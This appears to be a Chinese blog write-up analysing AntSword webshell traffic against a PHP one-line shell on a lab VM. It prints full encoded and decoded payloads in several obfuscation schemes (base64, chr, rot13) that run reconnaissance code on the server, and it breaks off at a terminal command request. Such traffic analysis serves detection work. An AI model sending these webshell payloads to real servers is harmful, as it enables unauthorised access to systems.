蚁剑流量分析

准备

靶机为一台运行kali的虚拟机,提前写了一句话

流量分析

测试连接

先用default编码

1
2
3
4
5
6
7
8
9
POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 993
Connection: close

cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%224eba6e362469%22%3Becho%20%40asenc(%24output)%3Becho%20%22b1c628%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

可以看到,User-Agent很明显看出是蚁剑

url解码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cmd=
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){
$output=ob_get_contents();#获取缓存区内容
ob_end_clean();
echo "4eba6e362469";
echo @asenc($output);
echo "b1c628";
}
ob_start();# 打开输出控制缓冲,将需要输出的内容存储在内部缓冲区中,R输出到缓存区
try{
$D=dirname($_SERVER["SCRIPT_FILENAME"]); #获取脚本执行路径
if($D=="") $D=dirname($_SERVER["PATH_TRANSLATED"]);#获取文档系统路径
$R="{$D} ";
if(substr($D,0,1)!="/"){#判断是否为windows系统以及盘符,linux都是/开始
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))$R.="{$L}:";
}
else{
$R.="/";
}
$R.=" ";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
#posix_getpwuid通过用户ID返回有关用户的信息
#posix_geteuid返回当前进程的有效用户ID
$s=($u)?$u["name"]:@get_current_user();#获取用户名
$R.=php_uname();
$R.=" {$s}";
echo $R;;
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();

其中cmd是密码,后面的是要执行的php命令

成功返回服务器信息

1
/var/www/html	/	Linux e8088063b385 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64	www-data

换成base64编码测试,解码器也换成base64,报文如下

1
2
3
4
5
6
7
8
9
POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 970
Connection: close

cmd=%40eval(%40base64_decode(%24_POST%5Bo2bd4cb489ef4a%5D))%3B&o2bd4cb489ef4a=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIjlmNGNlZWYiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjJjOWFmNGVkODkzIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D

url解码,base64解码

1
2
3
4
5
6
7
8
9
10
cmd=@eval(@base64_decode($_POST[o2bd4cb489ef4a]));
o2bd4cb489ef4a=
@ini_set("display_errors", "0");@set_time_limit(0);

function asenc($out){
return @base64_encode($out);
#只有这一处不同,会将返回的数据提前进行base64加密
};

function asoutput(){$output=ob_get_contents();ob_end_clean();echo "9f4ceef";echo @asenc($output);echo "2c9af4ed893";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

相当于是eval执行了个eval post里面是真正的命令,代码基本没差别

然后测试chr

1
2
3
4
5
6
7
8
9
POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5473
Connection: close

cmd=%40eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(36).ChR(111).ChR(117).ChR(116).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(49).ChR(55).ChR(99).ChR(54).ChR(56).ChR(54).ChR(48).ChR(100).ChR(56).ChR(55).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(101).ChR(51).ChR(57).ChR(57).ChR(99).ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59))%3B

可以看到命令是通过chr拼接的,chr16是16位的,和这个类似如下

1
2
3
4
5
6
7
8
9
POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 6462
Connection: close

cmd=%40eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).ChR(0x72).ChR(0x73).ChR(0x22).ChR(0x2c).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x74).ChR(0x69).ChR(0x6d).ChR(0x65).ChR(0x5f).ChR(0x6c).ChR(0x69).ChR(0x6d).ChR(0x69).ChR(0x74).ChR(0x28).ChR(0x30).ChR(0x29).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x7b).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x3d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x6f).ChR(0x6e).ChR(0x74).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x64).ChR(0x5f).ChR(0x63).ChR(0x6c).ChR(0x65).ChR(0x61).ChR(0x6e).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x33).ChR(0x65).ChR(0x32).ChR(0x35).ChR(0x62).ChR(0x36).ChR(0x63).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x40).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x61).ChR(0x37).ChR(0x35).ChR(0x61).ChR(0x38).ChR(0x38).ChR(0x61).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x74).ChR(0x72).ChR(0x79).ChR(0x7b).ChR(0x24).ChR(0x44).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x53).ChR(0x43).ChR(0x52).ChR(0x49).ChR(0x50).ChR(0x54).ChR(0x5f).ChR(0x46).ChR(0x49).ChR(0x4c).ChR(0x45).ChR(0x4e).ChR(0x41).ChR(0x4d).ChR(0x45).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x24).ChR(0x44).ChR(0x3d).ChR(0x3d).ChR(0x22).ChR(0x22).ChR(0x29).ChR(0x24).ChR(0x44).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x50).ChR(0x41).ChR(0x54).ChR(0x48).ChR(0x5f).ChR(0x54).ChR(0x52).ChR(0x41).ChR(0x4e).ChR(0x53).ChR(0x4c).ChR(0x41).ChR(0x54).ChR(0x45).ChR(0x44).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x52).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x44).ChR(0x7d).ChR(0x9).ChR(0x22).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x73).ChR(0x75).ChR(0x62).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x28).ChR(0x24).ChR(0x44).ChR(0x2c).ChR(0x30).ChR(0x2c).ChR(0x31).ChR(0x29).ChR(0x21).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x29).ChR(0x7b).ChR(0x66).ChR(0x6f).ChR(0x72).ChR(0x65).ChR(0x61).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x72).ChR(0x61).ChR(0x6e).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x22).ChR(0x43).ChR(0x22).ChR(0x2c).ChR(0x22).ChR(0x5a).ChR(0x22).ChR(0x29).ChR(0x61).ChR(0x73).ChR(0x20).ChR(0x24).ChR(0x4c).ChR(0x29).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x69).ChR(0x73).ChR(0x5f).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x28).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x4c).ChR(0x7d).ChR(0x3a).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x4c).ChR(0x7d).ChR(0x3a).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x9).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x75).ChR(0x3d).ChR(0x28).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x69).ChR(0x73).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x22).ChR(0x70).ChR(0x6f).ChR(0x73).ChR(0x69).ChR(0x78).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x65).ChR(0x67).ChR(0x69).ChR(0x64).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x3f).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x73).ChR(0x69).ChR(0x78).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x70).ChR(0x77).ChR(0x75).ChR(0x69).ChR(0x64).ChR(0x28).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x73).ChR(0x69).ChR(0x78).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x65).ChR(0x75).ChR(0x69).ChR(0x64).ChR(0x28).ChR(0x29).ChR(0x29).ChR(0x3a).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x73).ChR(0x3d).ChR(0x28).ChR(0x24).ChR(0x75).ChR(0x29).ChR(0x3f).ChR(0x24).ChR(0x75).ChR(0x5b).ChR(0x22).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x22).ChR(0x5d).ChR(0x3a).ChR(0x40).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x75).ChR(0x72).ChR(0x72).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x5f).ChR(0x75).ChR(0x73).ChR(0x65).ChR(0x72).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x70).ChR(0x68).ChR(0x70).ChR(0x5f).ChR(0x75).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x9).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x24).ChR(0x52).ChR(0x3b).ChR(0x3b).ChR(0x7d).ChR(0x63).ChR(0x61).ChR(0x74).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x45).ChR(0x78).ChR(0x63).ChR(0x65).ChR(0x70).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x65).ChR(0x29).ChR(0x7b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x45).ChR(0x52).ChR(0x52).ChR(0x4f).ChR(0x52).ChR(0x3a).ChR(0x2f).ChR(0x2f).ChR(0x22).ChR(0x2e).ChR(0x24).ChR(0x65).ChR(0x2d).ChR(0x3e).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x4d).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x61).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x64).ChR(0x69).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b))%3B

测试rot13

1
2
3
4
5
6
7
8
9
POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1064
Connection: close

cmd=%40eval(%40str_rot13(%24_POST%5Bm3fad46e15e6b5%5D))%3B&m3fad46e15e6b5=%40vav_frg(%22qvfcynl_reebef%22%2C%20%220%22)%3B%40frg_gvzr_yvzvg(0)%3Bshapgvba%20nfrap(%24bhg)%7Berghea%20%24bhg%3B%7D%3Bshapgvba%20nfbhgchg()%7B%24bhgchg%3Dbo_trg_pbagragf()%3Bbo_raq_pyrna()%3Brpub%20%223on4r1q%22%3Brpub%20%40nfrap(%24bhgchg)%3Brpub%20%22sps90147n686%22%3B%7Dbo_fgneg()%3Bgel%7B%24Q%3Dqveanzr(%24_FREIRE%5B%22FPEVCG_SVYRANZR%22%5D)%3Bvs(%24Q%3D%3D%22%22)%24Q%3Dqveanzr(%24_FREIRE%5B%22CNGU_GENAFYNGRQ%22%5D)%3B%24E%3D%22%7B%24Q%7D%09%22%3Bvs(fhofge(%24Q%2C0%2C1)!%3D%22%2F%22)%7Bsbernpu(enatr(%22P%22%2C%22M%22)nf%20%24Y)vs(vf_qve(%22%7B%24Y%7D%3A%22))%24E.%3D%22%7B%24Y%7D%3A%22%3B%7Dryfr%7B%24E.%3D%22%2F%22%3B%7D%24E.%3D%22%09%22%3B%24h%3D(shapgvba_rkvfgf(%22cbfvk_trgrtvq%22))%3F%40cbfvk_trgcjhvq(%40cbfvk_trgrhvq())%3A%22%22%3B%24f%3D(%24h)%3F%24h%5B%22anzr%22%5D%3A%40trg_pheerag_hfre()%3B%24E.%3Dcuc_hanzr()%3B%24E.%3D%22%09%7B%24f%7D%22%3Brpub%20%24E%3B%3B%7Dpngpu(Rkprcgvba%20%24r)%7Brpub%20%22REEBE%3A%2F%2F%22.%24r-%3EtrgZrffntr()%3B%7D%3Bnfbhgchg()%3Bqvr()%3B

url解码

1
2
cmd=@eval(@str_rot13($_POST[m3fad46e15e6b5]));
m3fad46e15e6b5=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);shapgvba nfrap($bhg){erghea $bhg;};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "3on4r1q";rpub @nfrap($bhgchg);rpub "sps90147n686";}bo_fgneg();gel{$Q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs($Q=="")$Q=qveanzr($_FREIRE["CNGU_GENAFYNGRQ"]);$E="{$Q} ";vs(fhofge($Q,0,1)!="/"){sbernpu(enatr("P","M")nf $Y)vs(vf_qve("{$Y}:"))$E.="{$Y}:";}ryfr{$E.="/";}$E.=" ";$h=(shapgvba_rkvfgf("cbfvk_trgrtvq"))?@cbfvk_trgcjhvq(@cbfvk_trgrhvq()):"";$f=($h)?$h["anzr"]:@trg_pheerag_hfre();$E.=cuc_hanzr();$E.=" {$f}";rpub $E;;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();

rot13解码

1
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "3ba4e1d";echo @asenc($output);echo "fcf90147a686";}ob_start();try{$d=dirname($_server["script_filename"]);if($d=="")$d=dirname($_server["path_translated"]);$r="{$d}	";if(substr($d,0,1)!="/"){foreach(range("c","z")as $l)if(is_dir("{$l}:"))$r.="{$l}:";}else{$r.="/";}$r.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$r.=php_uname();$r.="	{$s}";echo $r;;}catch(exception $e){echo "error://".$e->getmessage();};asoutput();die();

代码跟之前的一模一样

虚拟终端

测试一个最简单的ls命令

1
2
3
4
5
6
7
8
9
POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4019
Connection: close

